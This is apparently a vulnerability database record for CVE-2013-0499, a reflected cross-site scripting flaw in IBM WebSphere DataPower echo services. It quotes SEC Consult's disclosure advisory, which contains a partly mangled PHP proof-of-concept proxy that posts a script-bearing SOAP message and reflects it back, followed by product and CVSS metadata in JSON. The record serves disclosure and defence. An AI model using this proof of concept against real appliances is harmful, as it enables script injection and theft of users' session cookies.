VAR-201305-0236
Vulnerability from variot - Updated: 2023-12-18 12:58Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services. WebSphere DataPower SOA Appliances are prone to a cross-site scripting vulnerability. An attacker may leverage this issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. IBM WebSphere DataPower SOA Appliances is a set of network equipment of IBM Corporation in the United States. The appliance is primarily used to simplify, secure and accelerate XML and Web services deployment in SOA. SEC Consult Vulnerability Lab Security Advisory < 20130523-0 > ======================================================================= title: JavaScript Execution in WebSphere DataPower Services product: IBM WebSphere DataPower Integration Appliance XI50 vulnerable version: 3.8.2, 4.0, 4.0.1, 4.0.2, 5.0.0 fixed version: not available, config changes CVE number: CVE-2013-0499 impact: Low/Medium homepage: https://www.ibm.com/ found: 2013-01-28 by: A. Falkenberg SEC Consult Vulnerability Lab https://www.sec-consult.com =======================================================================
Vendor/product description:
WebSphere® DataPower® appliances simplify, govern, and optimize the delivery of services and applications and enhance the security of XML and IT services. They extend the capabilities of an infrastructure by providing a multitude of functions. URL: http://www-03.ibm.com/software/products/us/en/datapower/
Vulnerability overview/description:
For the purposes of debugging, DataPower provides configuration options to echo requests received from the client. For example, XML Firewall service can be configured to echo requests by choosing the backend as 'loopback'. Other services like Multi Protocol Gateway and Web Service Proxy can be configured to echo requests by setting the variable “var://service/mpgw/skip-backside” in its processing policy. In such configurations, the requests are not sent to a backend server. Without adequate validation and processing, the requests may be echoed back to the client. Loopback services that blindly echo requests should only be used for debugging purposes and not intended to be run in production environments as they can result in potential security threats. For example, if an arbitrary JavaScript embedded request is sent to such services, they will simply echo it back resulting in a potential JavaScript execution vulnerability in the client's browser. URL: https://www-304.ibm.com/support/docview.wss?uid=swg21637717
Proof of concept:
The proof of concept was tested on an IBM Xi50 with the backend configured as a "loopback" Web Service. Any valid SOAP message sent to the Web service is returned unmodified to the receiver. If the SOAP response of the "loopback" Web Service is parsed by a browser, any JavaScript that is contained within the XML document will get executed. The following PHP script demonstrates a reflected cross site scripting.
alert("XML XSS"); ';
if(isset($_POST['soapMessage']) and isset($_POST['soapUrl'])){
$soap_do = curl_init();
curl_setopt($soap_do, CURLOPT_URL, $_POST['soapUrl'] );
curl_setopt($soap_do, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($soap_do, CURLOPT_TIMEOUT, 10);
curl_setopt($soap_do, CURLOPT_RETURNTRANSFER, true );
curl_setopt($soap_do, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($soap_do, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($soap_do, CURLOPT_POST, true );
curl_setopt($soap_do, CURLOPT_POSTFIELDS, $_POST['soapMessage']);
curl_setopt($soap_do, CURLOPT_HTTPHEADER, array('Content-Type: text/xml; charset=utf-8', 'Content-Length: '.strlen($_POST['soapMessage']) ));
$result = curl_exec($soap_do);
$err = curl_error($soap_do);
header('Content-type: text/xml');
echo $result;
exit;
} ?>
XSS XML Proxy
SOAP Endpoint:SOAP Message:
Vulnerable / tested versions:
SEC Consult verified the vulnerability in the WebSphere DataPower Appliance XI50. The vendor provided an extended list of vulnerable versions: WebSphere DataPower 3.8.2, 4.0, 4.0.1, 4.0.2, 5.0.0.
Vendor contact timeline:
2013-01-30: Sending advisory and proof of concept exploit via encrypted channel. 2013-01-31: Vendor confirms receipt 2013-05-17: Vendor posts security bulletin 2013-05-23: SEC Consult releases coordinated security advisory.
Solution:
The vendor does not offer a patch.
The vulnerability can be prevented by disabling the services to blindly echo requests back. A detailed description can be found on the vendor's site: https://www-304.ibm.com/support/docview.wss?uid=swg21637717
Advisory URL:
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH
Office Vienna Mooslackengasse 17 A-1190 Vienna Austria
Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult
EOF A. Falkenberg / @2013
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201305-0236",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "websphere datapower service gateway xg45 virtual edition",
"scope": "eq",
"trust": 1.8,
"vendor": "ibm",
"version": "3.8.2"
},
{
"model": "websphere datapower service gateway xg45 virtual edition",
"scope": "eq",
"trust": 1.8,
"vendor": "ibm",
"version": "4.0"
},
{
"model": "websphere datapower service gateway xg45 virtual edition",
"scope": "eq",
"trust": 1.8,
"vendor": "ibm",
"version": "4.0.1"
},
{
"model": "websphere datapower service gateway xg45 virtual edition",
"scope": "eq",
"trust": 1.8,
"vendor": "ibm",
"version": "4.0.2"
},
{
"model": "websphere datapower service gateway xg45 virtual edition",
"scope": "eq",
"trust": 1.8,
"vendor": "ibm",
"version": "5.0.0"
},
{
"model": "websphere datapower service gateway xg45",
"scope": "eq",
"trust": 1.8,
"vendor": "ibm",
"version": "3.8.2"
},
{
"model": "websphere datapower service gateway xg45",
"scope": "eq",
"trust": 1.8,
"vendor": "ibm",
"version": "4.0"
},
{
"model": "websphere datapower service gateway xg45",
"scope": "eq",
"trust": 1.8,
"vendor": "ibm",
"version": "4.0.1"
},
{
"model": "websphere datapower service gateway xg45",
"scope": "eq",
"trust": 1.8,
"vendor": "ibm",
"version": "4.0.2"
},
{
"model": "websphere datapower service gateway xg45",
"scope": "eq",
"trust": 1.8,
"vendor": "ibm",
"version": "5.0.0"
},
{
"model": "websphere datapower b2b appliance xb62",
"scope": "eq",
"trust": 1.6,
"vendor": "ibm",
"version": "4.0.2"
},
{
"model": "websphere datapower integration appliance xi50",
"scope": "eq",
"trust": 1.6,
"vendor": "ibm",
"version": "5.0.0"
},
{
"model": "websphere datapower b2b appliance xb62",
"scope": "eq",
"trust": 1.6,
"vendor": "ibm",
"version": "4.0.1"
},
{
"model": "websphere datapower b2b appliance xb62",
"scope": "eq",
"trust": 1.6,
"vendor": "ibm",
"version": "4.0"
},
{
"model": "websphere datapower integration appliance xi50",
"scope": "eq",
"trust": 1.6,
"vendor": "ibm",
"version": "4.0.2"
},
{
"model": "websphere datapower integration appliance xi50",
"scope": "eq",
"trust": 1.6,
"vendor": "ibm",
"version": "4.0.1"
},
{
"model": "websphere datapower integration appliance xi50",
"scope": "eq",
"trust": 1.6,
"vendor": "ibm",
"version": "4.0"
},
{
"model": "websphere datapower b2b appliance xb62",
"scope": "eq",
"trust": 1.6,
"vendor": "ibm",
"version": "5.0.0"
},
{
"model": "websphere datapower b2b appliance xb62",
"scope": "eq",
"trust": 1.6,
"vendor": "ibm",
"version": "3.8.2"
},
{
"model": "websphere datapower integration appliance xi50",
"scope": "eq",
"trust": 1.6,
"vendor": "ibm",
"version": "3.8.2"
},
{
"model": "websphere datapower integration appliance xi52",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "4.0"
},
{
"model": "websphere datapower xc10 appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "5.0.0"
},
{
"model": "websphere datapower xc10 appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "4.0.2"
},
{
"model": "websphere datapower xc10 appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "4.0.1"
},
{
"model": "websphere datapower xc10 appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": null
},
{
"model": "websphere datapower service gateway xg45",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": null
},
{
"model": "websphere datapower xc10 appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "4.0"
},
{
"model": "websphere datapower integration appliance xi52",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": null
},
{
"model": "websphere datapower b2b appliance xb62",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": null
},
{
"model": "websphere datapower integration appliance xi52 virtual edition",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "3.8.2"
},
{
"model": "websphere datapower integration appliance xi52",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "3.8.2"
},
{
"model": "websphere datapower integration appliance xi52 virtual edition",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": null
},
{
"model": "websphere datapower integration appliance xi52 virtual edition",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "5.0.0"
},
{
"model": "websphere datapower integration appliance xi52",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "5.0.0"
},
{
"model": "websphere datapower integration appliance xi52 virtual edition",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "4.0.2"
},
{
"model": "websphere datapower integration appliance xi50",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": null
},
{
"model": "websphere datapower xc10 appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "3.8.2"
},
{
"model": "websphere datapower integration appliance xi52",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "4.0.2"
},
{
"model": "websphere datapower service gateway xg45 virtual edition",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": null
},
{
"model": "websphere datapower integration appliance xi52 virtual edition",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "4.0.1"
},
{
"model": "websphere datapower integration appliance xi52 virtual edition",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "4.0"
},
{
"model": "websphere datapower integration appliance xi52",
"scope": "eq",
"trust": 1.0,
"vendor": "ibm",
"version": "4.0.1"
},
{
"model": "websphere datapower b2b the appliance xb62",
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": "websphere datapower b2b the appliance xb62",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "3.8.2"
},
{
"model": "websphere datapower b2b the appliance xb62",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "4.0"
},
{
"model": "websphere datapower b2b the appliance xb62",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "4.0.1"
},
{
"model": "websphere datapower b2b the appliance xb62",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "4.0.2"
},
{
"model": "websphere datapower b2b the appliance xb62",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "5.0.0"
},
{
"model": "websphere datapower integration the appliance xi50",
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": "websphere datapower integration the appliance xi50",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "3.8.2"
},
{
"model": "websphere datapower integration the appliance xi50",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "4.0"
},
{
"model": "websphere datapower integration the appliance xi50",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "4.0.1"
},
{
"model": "websphere datapower integration the appliance xi50",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "4.0.2"
},
{
"model": "websphere datapower integration the appliance xi50",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "5.0.0"
},
{
"model": "websphere datapower integration the appliance xi52",
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": "websphere datapower integration the appliance xi52 virtual edition",
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": "websphere datapower integration the appliance xi52 virtual edition",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "3.8.2"
},
{
"model": "websphere datapower integration the appliance xi52 virtual edition",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "4.0"
},
{
"model": "websphere datapower integration the appliance xi52 virtual edition",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "4.0.1"
},
{
"model": "websphere datapower integration the appliance xi52 virtual edition",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "4.0.2"
},
{
"model": "websphere datapower integration the appliance xi52 virtual edition",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "5.0.0"
},
{
"model": "websphere datapower integration the appliance xi52",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "3.8.2"
},
{
"model": "websphere datapower integration the appliance xi52",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "4.0"
},
{
"model": "websphere datapower integration the appliance xi52",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "4.0.1"
},
{
"model": "websphere datapower integration the appliance xi52",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "4.0.2"
},
{
"model": "websphere datapower integration the appliance xi52",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "5.0.0"
},
{
"model": "websphere datapower service gateway xg45",
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": "websphere datapower service gateway xg45 virtual edition",
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": "websphere datapower xc10 the appliance",
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": "websphere datapower xc10 the appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "3.8.2"
},
{
"model": "websphere datapower xc10 the appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "4.0"
},
{
"model": "websphere datapower xc10 the appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "4.0.1"
},
{
"model": "websphere datapower xc10 the appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "4.0.2"
},
{
"model": "websphere datapower xc10 the appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "ibm",
"version": "5.0.0"
},
{
"model": "websphere datapower soa appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.0.2"
},
{
"model": "websphere datapower soa appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.0.1"
},
{
"model": "websphere datapower soa appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.8.2"
},
{
"model": "websphere datapower soa appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.0"
}
],
"sources": [
{
"db": "BID",
"id": "60027"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-002845"
},
{
"db": "NVD",
"id": "CVE-2013-0499"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-593"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:3.8.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:4.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_xc10_appliance_firmware:5.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_xc10_appliance:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:5.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:3.8.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_virtual_edition_firmware:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_service_gateway_xg45_virtual_edition:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:5.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:3.8.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_service_gateway_xg45_firmware:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_service_gateway_xg45:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:5.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:3.8.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition_firmware:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi52_virtual_edition:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:5.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:4.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi52_firmware:3.8.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi52:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:5.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_integration_appliance_xi50_firmware:3.8.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_integration_appliance_xi50:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:3.8.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:4.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:ibm:websphere_datapower_b2b_appliance_xb62_firmware:5.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:ibm:websphere_datapower_b2b_appliance_xb62:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-0499"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A. Falkenberg",
"sources": [
{
"db": "BID",
"id": "60027"
},
{
"db": "PACKETSTORM",
"id": "121738"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-593"
}
],
"trust": 1.0
},
"cve": "CVE-2013-0499",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2013-0499",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-60501",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-0499",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201305-593",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-60501",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-60501"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-002845"
},
{
"db": "NVD",
"id": "CVE-2013-0499"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-593"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
